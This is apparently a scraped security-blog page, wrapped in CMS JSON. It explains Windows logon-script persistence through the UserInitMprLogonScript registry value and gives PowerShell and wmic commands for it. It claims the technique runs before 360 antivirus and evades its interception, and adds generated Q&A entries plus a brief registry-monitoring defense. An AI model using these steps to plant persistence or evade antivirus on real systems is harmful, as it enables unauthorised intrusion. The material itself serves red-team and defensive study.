Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article continues the series on backdoor exploitation methods, focusing on the use of Logon Scripts. During my research, I discovered a particular technique where scripts execute before antivirus software, allowing them to bypass antivirus interception of sensitive operations. This article will detail this technique.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Some antivirus software can start before Logon Scripts.\u003C\u002Fp>\u003Ch2>0x01 Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>Usage of Logon Scripts\u003C\u002Fli>\u003Cli>Bypassing 360's interception of WMI calls\u003C\u002Fli>\u003Cli>Special Techniques\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Usage of Logon Scripts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The idea originates from Adam@Hexacorn, with the following address:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.hexacorn.com\u002Fblog\u002F2014\u002F11\u002F14\u002Fbeyond-good-ol-run-key-part-18\u002F\u003C\u002Fp>\u003Ch3>Brief introduction to the usage of Logon Scripts\u003C\u002Fh3>\u003Cp>Registry path: HKCU\\Environment\\\u003C\u002Fp>\u003Cp>Create string key value: UserInitMprLogonScript\u003C\u002Fp>\u003Cp>Set key value to absolute path of bat: c:\\test\\11.bat\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016714386_0_81861fd612-1.jpeg\">\u003C\u002Fp>\u003Cp>The content of the bat is as follows:\u003C\u002Fp>\u003Cp>start calc.exe\u003C\u002Fp>\u003Cp>Log off, log on\u003C\u002Fp>\u003Cp>Execute script 11.bat, calculator pops up\u003C\u002Fp>\u003Ch2>0x03 Bypass 360's interception of modifying environment variables via WMI\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>As mentioned in the previous article 'Use CLR to maintain persistence', the method of using wmic to modify environment variables\u003C\u002Fp>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic ENVIRONMENT create name=\"COR_ENABLE_PROFILING\",username=\"%username%\",VariableValue=\"1\"\u003Cbr>\u003Cbr>wmic ENVIRONMENT create name=\"COR_PROFILER\",username=\"%username%\",VariableValue=\"{11111111-1111-1111-1111-111111111111}\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>However, 360 will intercept WMI operations, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016717261_1_b0cdc42c34-1.jpeg\">\u003C\u002Fp>\u003Cp>In fact, adding environment variables via WMI is equivalent to creating key-values in the registry HKCR\\Environment\\\u003C\u002Fp>\u003Cp>Therefore, WMI operations can be replaced by writing to the registry\u003C\u002Fp>\u003Cp>The above WMI command can be replaced with the following PowerShell code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>New-ItemProperty \"HKCU:\\Environment\\\" COR_ENABLE_PROFILING -value \"1\" -propertyType string | Out-Null\u003Cbr>\u003Cbr>New-ItemProperty \"HKCU:\\Environment\\\" COR_PROFILER -value \"{11111111-1111-1111-1111-111111111111}\" -propertyType string | Out-Null\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Special Usage\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Originating from a unique idea of mine\u003C\u002Fp>\u003Cp>During my research on this technique, I had an interesting thought: Do Logon Scripts start before other programs?\u003C\u002Fp>\u003Cp>If so, do they also start before antivirus software?\u003C\u002Fp>\u003Cp>Now, let's begin my test:\u003C\u002Fp>\u003Ch3>1. Enter the following code in cmd:\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic ENVIRONMENT create name=\"test\",username=\"%username%\",VariableValue=\"I run faster!\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As expected, it was blocked\u003C\u002Fp>\u003Ch3>2. Setting Logon Scripts\u003C\u002Fh3>\u003Cp>The code for 11.bat is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic ENVIRONMENT create name=\"test\",username=\"%username%\",VariableValue=\"I run faster!\"\u003Cbr>reg query HKEY_CURRENT_USER\\Environment \u002FV test\u003Cbr>pause\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Enabling Logon Scripts\u003C\u002Fh3>\u003Cp>Registry path: HKCR\\Environment\\\u003C\u002Fp>\u003Cp>Create a string key value: UserInitMprLogonScript\u003C\u002Fp>\u003Cp>Set the key value to the absolute path of the bat file: c:\\test\\11.bat\u003C\u002Fp>\u003Cp>Since calling WMI will be blocked, it can be implemented via PowerShell with the following code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>New-ItemProperty \"HKCU:\\Environment\\\" UserInitMprLogonScript -value \"c:\\test\\11.bat\" -propertyType string | Out-Null\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Log off, log back in, and test\u003C\u002Fh3>\u003Cp>If the registry HKCR\\Environment\\ is successfully written with the key value test REG_SZ I run faster!, it indicates that Logon Scripts execute before antivirus software, bypassing its restrictions\u003C\u002Fp>\u003Cp>The complete operation is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016723345_2_d09ecdd162-1.png\">\u003C\u002Fp>\u003Cp>Test successful, verifying our conclusion\u003C\u002Fp>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Monitor registry key HKCR\\Environment\\UserInitMprLogonScript\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article tests the usage of Logon Scripts and introduces a special application: Logon Scripts can execute before antivirus software, bypassing its interception of sensitive operations.\u003C\u002Fp>\u003Cp>From a defensive perspective, vigilance should be maintained against this.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",{"id":22,"alt":331,"caption":332,"updatedAt":333,"createdAt":333,"url":334,"thumbnailURL":32,"filename":335,"mimeType":336,"filesize":337,"width":338,"height":339,"focalX":340,"focalY":340,"sizes":341},"docx image 1770016714386 0 81861fd612","legacy:\u002Fuploads\u002Fdocx_image_1770016714386_0_81861fd612.jpeg","2026-07-24T15:36:44.274Z","\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016714386_0_81861fd612-1.jpeg","docx_image_1770016714386_0_81861fd612-1.jpeg","image\u002Fjpeg",35360,982,284,50,{"thumbnail":342,"card":343,"og":344},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},3,{"title":347,"description":321,"keywords":348,"ogImage":32,"canonicalUrl":32,"noIndex":40},"Logon Scripts Persistence: Bypass Antivirus with Pre-Execution","logon scripts, persistence, bypass antivirus, WMI interception, registry exploit, backdoor techniques, security evasion",[],{"docs":351,"hasNextPage":53},[311,352,353,354,355,356,357,358,359,360],1274,1273,1272,1271,1270,1269,1268,1267,1266,{"title":32,"description":32,"image":32},"2026-07-24T15:37:08.719Z","2026-07-23T16:02:42.266Z","2026-07-23T16:17:48.939Z",{"id":352,"question":366,"answer":367,"answerHtml":368,"slug":369,"keywords":370,"article":371,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":388,"createdAt":388,"_status":57},"Does the Logon Scripts technique allow execution before antivirus software starts?","Yes, the article demonstrates that Logon Scripts execute before certain antivirus software like 360, allowing malicious scripts to perform restricted operations (e.g., creating environment variables via WMI) without being blocked. This was tested by writing a value to the registry within the logon script and confirming it succeeded. For details, check the [Logon Scripts persistence article](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence).","\u003Cp>Yes, the article demonstrates that Logon Scripts execute before certain antivirus software like 360, allowing malicious scripts to perform restricted operations (e.g., creating environment variables via WMI) without being blocked. This was tested by writing a value to the registry within the logon script and confirming it succeeded. For details, check the [Logon Scripts persistence article](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","does-the-logon-scripts-technique-allow-execution-before-antivirus-software-start-1777479956767","Logon Scripts, antivirus bypass, execution order, 360",{"id":318,"title":319,"slug":320,"description":321,"content":372,"contentHtml":329,"cover":378,"author":33,"views":21,"readingTime":345,"status":35,"publishedAt":36,"seo":383,"tags":384,"qaPairs":385,"meta":387,"updatedAt":362,"createdAt":363,"_status":57},{"root":373},{"type":19,"format":20,"indent":21,"version":22,"children":374,"direction":31},[375],{"type":25,"format":20,"indent":21,"version":22,"children":376,"direction":31},[377],{"mode":28,"text":328,"type":30,"style":20,"detail":21,"format":21,"version":22},{"id":22,"alt":331,"caption":332,"updatedAt":333,"createdAt":333,"url":334,"thumbnailURL":32,"filename":335,"mimeType":336,"filesize":337,"width":338,"height":339,"focalX":340,"focalY":340,"sizes":379},{"thumbnail":380,"card":381,"og":382},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"title":347,"description":321,"keywords":348,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":386,"hasNextPage":53},[311,352,353,354,355,356,357,358,359,360],{"title":32,"description":32,"image":32},"2026-07-23T16:17:48.716Z",{"id":353,"question":390,"answer":391,"answerHtml":392,"slug":393,"keywords":394,"article":395,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":412,"createdAt":412,"_status":57},"How can attackers bypass 360 antivirus's interception of WMI calls when setting environment variables for persistence?","360 antivirus intercepts WMI calls like `wmic ENVIRONMENT create`, but attackers can bypass this by writing directly to the registry using PowerShell. For example, `New-ItemProperty \"HKCU:\\Environment\\\" COR_ENABLE_PROFILING -value \"1\" -propertyType string` achieves the same effect as the WMI command without triggering antivirus alerts, as described in the [Logon Scripts article](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence).","\u003Cp>360 antivirus intercepts WMI calls like `wmic ENVIRONMENT create`, but attackers can bypass this by writing directly to the registry using PowerShell. For example, `New-ItemProperty &quot;HKCU:\\Environment\\&quot; COR_ENABLE_PROFILING -value &quot;1&quot; -propertyType string` achieves the same effect as the WMI command without triggering antivirus alerts, as described in the [Logon Scripts article](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-attackers-bypass-360-antiviruss-interception-of-wmi-calls-when-setting-e-1777479956698","360 antivirus, WMI bypass, registry, PowerShell, environment variables",{"id":318,"title":319,"slug":320,"description":321,"content":396,"contentHtml":329,"cover":402,"author":33,"views":21,"readingTime":345,"status":35,"publishedAt":36,"seo":407,"tags":408,"qaPairs":409,"meta":411,"updatedAt":362,"createdAt":363,"_status":57},{"root":397},{"type":19,"format":20,"indent":21,"version":22,"children":398,"direction":31},[399],{"type":25,"format":20,"indent":21,"version":22,"children":400,"direction":31},[401],{"mode":28,"text":328,"type":30,"style":20,"detail":21,"format":21,"version":22},{"id":22,"alt":331,"caption":332,"updatedAt":333,"createdAt":333,"url":334,"thumbnailURL":32,"filename":335,"mimeType":336,"filesize":337,"width":338,"height":339,"focalX":340,"focalY":340,"sizes":403},{"thumbnail":404,"card":405,"og":406},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"title":347,"description":321,"keywords":348,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":410,"hasNextPage":53},[311,352,353,354,355,356,357,358,359,360],{"title":32,"description":32,"image":32},"2026-07-23T16:17:47.951Z",{"id":354,"question":414,"answer":415,"answerHtml":416,"slug":417,"keywords":418,"article":419,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":436,"createdAt":437,"_status":57},"What is the Logon Scripts persistence technique and how is it configured?","The Logon Scripts persistence technique involves setting the `UserInitMprLogonScript` registry value under `HKCU\\Environment` to point to a script (e.g., a .bat file). When the user logs on, the script executes automatically, providing a stealthy method for maintaining access. For a full walkthrough, see [Use Logon Scripts to maintain persistence](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence).","\u003Cp>The Logon Scripts persistence technique involves setting the `UserInitMprLogonScript` registry value under `HKCU\\Environment` to point to a script (e.g., a .bat file). When the user logs on, the script executes automatically, providing a stealthy method for maintaining access. For a full walkthrough, see [Use Logon Scripts to maintain persistence](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-the-logon-scripts-persistence-technique-and-how-is-it-configured-1777479956644","Logon Scripts, UserInitMprLogonScript, persistence, registry",{"id":318,"title":319,"slug":320,"description":321,"content":420,"contentHtml":329,"cover":426,"author":33,"views":21,"readingTime":345,"status":35,"publishedAt":36,"seo":431,"tags":432,"qaPairs":433,"meta":435,"updatedAt":362,"createdAt":363,"_status":57},{"root":421},{"type":19,"format":20,"indent":21,"version":22,"children":422,"direction":31},[423],{"type":25,"format":20,"indent":21,"version":22,"children":424,"direction":31},[425],{"mode":28,"text":328,"type":30,"style":20,"detail":21,"format":21,"version":22},{"id":22,"alt":331,"caption":332,"updatedAt":333,"createdAt":333,"url":334,"thumbnailURL":32,"filename":335,"mimeType":336,"filesize":337,"width":338,"height":339,"focalX":340,"focalY":340,"sizes":427},{"thumbnail":428,"card":429,"og":430},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"title":347,"description":321,"keywords":348,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":434,"hasNextPage":53},[311,352,353,354,355,356,357,358,359,360],{"title":32,"description":32,"image":32},"2026-07-23T16:17:47.480Z","2026-07-23T16:17:47.479Z",{"id":355,"question":439,"answer":440,"answerHtml":441,"slug":442,"keywords":443,"article":444,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":461,"createdAt":461,"_status":57},"What is the recommended defense against Logon Scripts persistence attacks?","The primary defense is to monitor changes to the registry key `HKCR\\Environment\\UserInitMprLogonScript`. Any unauthorized creation or modification of this key should trigger an alert. Additionally, organizations should enforce strict access controls on the registry and use endpoint detection and response (EDR) tools to detect suspicious logon script executions.\n\n---\n**Related reading:**\n- [Use Logon Scripts to maintain persistence](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence) — original article\n- [Penetration Techniques - Obtaining Net-NTLM Hash via HTTP Protocol](\u002Fnews\u002Fpenetration-techniques-obtaining-net-ntlm-hash-via-http-protocol)\n- [Webmin\u003C=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\n- [Pupy Exploitation Analysis - Features on Windows Platform](\u002Fnews\u002Fpupy-exploitation-analysis-features-on-windows-platform)","\u003Cp>The primary defense is to monitor changes to the registry key `HKCR\\Environment\\UserInitMprLogonScript`. Any unauthorized creation or modification of this key should trigger an alert. Additionally, organizations should enforce strict access controls on the registry and use endpoint detection and response (EDR) tools to detect suspicious logon script executions.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Use Logon Scripts to maintain persistence](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence) — original article\u003Cbr>- [Penetration Techniques - Obtaining Net-NTLM Hash via HTTP Protocol](\u002Fnews\u002Fpenetration-techniques-obtaining-net-ntlm-hash-via-http-protocol)\u003Cbr>- [Webmin&lt;=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\u003Cbr>- [Pupy Exploitation Analysis - Features on Windows Platform](\u002Fnews\u002Fpupy-exploitation-analysis-features-on-windows-platform)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-the-recommended-defense-against-logon-scripts-persistence-attacks-1777477604977","defense, registry monitoring, UserInitMprLogonScript, endpoint security, EDR",{"id":318,"title":319,"slug":320,"description":321,"content":445,"contentHtml":329,"cover":451,"author":33,"views":21,"readingTime":345,"status":35,"publishedAt":36,"seo":456,"tags":457,"qaPairs":458,"meta":460,"updatedAt":362,"createdAt":363,"_status":57},{"root":446},{"type":19,"format":20,"indent":21,"version":22,"children":447,"direction":31},[448],{"type":25,"format":20,"indent":21,"version":22,"children":449,"direction":31},[450],{"mode":28,"text":328,"type":30,"style":20,"detail":21,"format":21,"version":22},{"id":22,"alt":331,"caption":332,"updatedAt":333,"createdAt":333,"url":334,"thumbnailURL":32,"filename":335,"mimeType":336,"filesize":337,"width":338,"height":339,"focalX":340,"focalY":340,"sizes":452},{"thumbnail":453,"card":454,"og":455},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"title":347,"description":321,"keywords":348,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":459,"hasNextPage":53},[311,352,353,354,355,356,357,358,359,360],{"title":32,"description":32,"image":32},"2026-07-23T16:17:47.280Z",{"id":356,"question":463,"answer":464,"answerHtml":465,"slug":466,"keywords":467,"article":468,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":485,"createdAt":485,"_status":57},"Why might an attacker replace WMI commands with registry modifications when using Logon Scripts?","Antivirus software like 360 often intercepts WMI calls used to create environment variables. Since adding environment variables via WMI is equivalent to writing to the registry (specifically `HKCU\\Environment`), an attacker can bypass the WMI interception by directly writing to the registry using PowerShell or similar tools. This makes the technique stealthier and more reliable.\n\n---\n**Related reading:**\n- [Use Logon Scripts to maintain persistence](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence) — original article\n- [Penetration Techniques - Obtaining Net-NTLM Hash via HTTP Protocol](\u002Fnews\u002Fpenetration-techniques-obtaining-net-ntlm-hash-via-http-protocol)\n- [Webmin\u003C=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\n- [Pupy Exploitation Analysis - Features on Windows Platform](\u002Fnews\u002Fpupy-exploitation-analysis-features-on-windows-platform)","\u003Cp>Antivirus software like 360 often intercepts WMI calls used to create environment variables. Since adding environment variables via WMI is equivalent to writing to the registry (specifically `HKCU\\Environment`), an attacker can bypass the WMI interception by directly writing to the registry using PowerShell or similar tools. This makes the technique stealthier and more reliable.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Use Logon Scripts to maintain persistence](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence) — original article\u003Cbr>- [Penetration Techniques - Obtaining Net-NTLM Hash via HTTP Protocol](\u002Fnews\u002Fpenetration-techniques-obtaining-net-ntlm-hash-via-http-protocol)\u003Cbr>- [Webmin&lt;=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\u003Cbr>- [Pupy Exploitation Analysis - Features on Windows Platform](\u002Fnews\u002Fpupy-exploitation-analysis-features-on-windows-platform)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","why-might-an-attacker-replace-wmi-commands-with-registry-modifications-when-usin-1777477604930","registry modification, WMI bypass, environment variables, PowerShell, antivirus evasion",{"id":318,"title":319,"slug":320,"description":321,"content":469,"contentHtml":329,"cover":475,"author":33,"views":21,"readingTime":345,"status":35,"publishedAt":36,"seo":480,"tags":481,"qaPairs":482,"meta":484,"updatedAt":362,"createdAt":363,"_status":57},{"root":470},{"type":19,"format":20,"indent":21,"version":22,"children":471,"direction":31},[472],{"type":25,"format":20,"indent":21,"version":22,"children":473,"direction":31},[474],{"mode":28,"text":328,"type":30,"style":20,"detail":21,"format":21,"version":22},{"id":22,"alt":331,"caption":332,"updatedAt":333,"createdAt":333,"url":334,"thumbnailURL":32,"filename":335,"mimeType":336,"filesize":337,"width":338,"height":339,"focalX":340,"focalY":340,"sizes":476},{"thumbnail":477,"card":478,"og":479},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"url":32,"width":32,"height":32,"mimeType":32,"filesize":32,"filename":32},{"title":347,"description":321,"keywords":348,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":483,"hasNextPage":53},[311,352,353,354,355,356,357,358,359,360],{"title":32,"description":32,"image":32},"2026-07-23T16:17:47.090Z",20,2,65]